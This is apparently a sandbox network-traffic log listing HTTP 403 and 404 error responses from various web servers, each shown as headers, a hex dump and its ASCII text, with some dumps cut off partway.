    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 09:16:32 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Nov 2023 04:16:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 06:16:52 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 07:16:52 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:16:57 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1iContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:37:22 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 23 Nov 2023 03:17:00 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Thu, 23 Nov 2023 04:17:09 GMTServer: lighttpd/1.4.59Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Thu, 23 Nov 2023 04:17:11 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:17:32 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONSAccess-Control-Allow-Headers: content-type, acceptConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlX-Frame-Options: SAMEORIGINContent-Length: 341Connection: closeDate: Thu, 23 Nov 2023 05:17:26 GMTServer: lighttpd/1.4.55Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Thu, 23 Nov 2023 04:17:42 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 32 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 